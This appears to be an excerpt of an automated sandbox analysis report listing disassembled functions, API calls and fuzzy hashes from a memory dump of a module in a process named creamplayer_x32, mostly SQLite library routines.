                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 251237202-0
                                                                                                    • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                                    • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                                                    • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                                    • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                                                    APIs
                                                                                                    • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                                                    • String ID:
                                                                                                    • API String ID: 4225432645-0
                                                                                                    • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                                    • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                                                    • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                                                    • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 6090359D
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 609035E0
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 609035F9
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,-00000200,?), ref: 60903614
                                                                                                    • sqlite3_free.SQLITE3(?,-00000200,?), ref: 6090361C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 251237202-0
                                                                                                    • Opcode ID: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                                                    • Instruction ID: 98a7ce7f1ce2ff6a0e5ca4ca87ec4bf20a5c319c62b2fc6798152503390b0136
                                                                                                    • Opcode Fuzzy Hash: d176fa110bd2286076a254f1a84b89a7a2b75649dc4a807f2bdee778eef171d4
                                                                                                    • Instruction Fuzzy Hash: B211FE725186218BCB00EF7DC8C16197FE7FB66358F01491DE866D7362D73AD480AB42
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log
                                                                                                    • String ID: ($string or blob too big$|
                                                                                                    • API String ID: 632333372-2398534278
                                                                                                    • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                                    • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                                                    • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                                    • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmp
                                                                                                    • String ID: BINARY
                                                                                                    • API String ID: 912767213-907554435
                                                                                                    • Opcode ID: dd54eeba7b99beb4c129e1ce0ebb3c97c4d31291de79a9977aa1c0a9ff3222ee
                                                                                                    • Instruction ID: 142a1e9d4f1e8552d2c1f4074703eb5ae9f1e70d76b7ded3e689f9c37387bea1
                                                                                                    • Opcode Fuzzy Hash: dd54eeba7b99beb4c129e1ce0ebb3c97c4d31291de79a9977aa1c0a9ff3222ee
                                                                                                    • Instruction Fuzzy Hash: 11512AB8A142159FCF05CF68D580A9EBBFBBFA9314F208569D855AB318D335EC41CB90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$Protect$Query
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3618607426-2766056989
                                                                                                    • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                                    • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                                                    • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                                    • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                                      • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                                    • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                                    • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                                    • String ID: d
                                                                                                    • API String ID: 211589378-2564639436
                                                                                                    • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                                    • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                                                    • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                                    • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                                    • API String ID: 1646373207-2713375476
                                                                                                    • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                                    • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                                                    • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                                    • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2313487548-0
                                                                                                    • Opcode ID: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                                    • Instruction ID: 4e09bb13dd5a3c3c1d339de95b14bc5918580ae4e3dbdcf066e72e084d482625
                                                                                                    • Opcode Fuzzy Hash: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                                    • Instruction Fuzzy Hash: 15E14674928209EFDB04CF94D184B9EBBB2FF69304F208558D8956B259D774EC86CF81
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: sqlite_master$sqlite_sequence$sqlite_temp_master
                                                                                                    • API String ID: 0-1177837799
                                                                                                    • Opcode ID: b45b6970ebe54efa46efcb65f0e1138f7cff2b55d537d73117a3441f01693427
                                                                                                    • Instruction ID: e5240d50caebec33bd4ce83d4b9fb982fe545a794019e3d400788b6e3ec19482
                                                                                                    • Opcode Fuzzy Hash: b45b6970ebe54efa46efcb65f0e1138f7cff2b55d537d73117a3441f01693427
                                                                                                    • Instruction Fuzzy Hash: F7C13974B062089BDB05DF68D49179EBBF3AFA8308F14C42DE8899B345DB39D841CB41
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 1648232842-0
                                                                                                    • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                                    • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                                                    • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                                    • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                                                    APIs
                                                                                                    • sqlite3_step.SQLITE3 ref: 609614AB
                                                                                                    • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                                      • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                                      • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                                                    • String ID:
                                                                                                    • API String ID: 3429445273-0
                                                                                                    • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                                    • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                                                    • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                                    • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_snprintf$sqlite3_stricmpsqlite3_value_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 1035992805-0
                                                                                                    • Opcode ID: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                                    • Instruction ID: 84d28b158f1a11e063f70be148de9c7b2eff514b3bcf7808f17aa895500be78a
                                                                                                    • Opcode Fuzzy Hash: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                                    • Instruction Fuzzy Hash: 8C3178B0A08324DFEB24CF28C481B4ABBF6FBA5318F04C499E4888B251C775D885DF42
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                                                    • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                                                    • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                                                    • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                                    • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                                                    • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                                    • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                                      • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                                    • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 2673540737-0
                                                                                                    • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                                    • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                                                    • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                                    • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                                    • String ID:
                                                                                                    • API String ID: 3526213481-0
                                                                                                    • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                                    • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                                                    • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                                    • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                                                    APIs
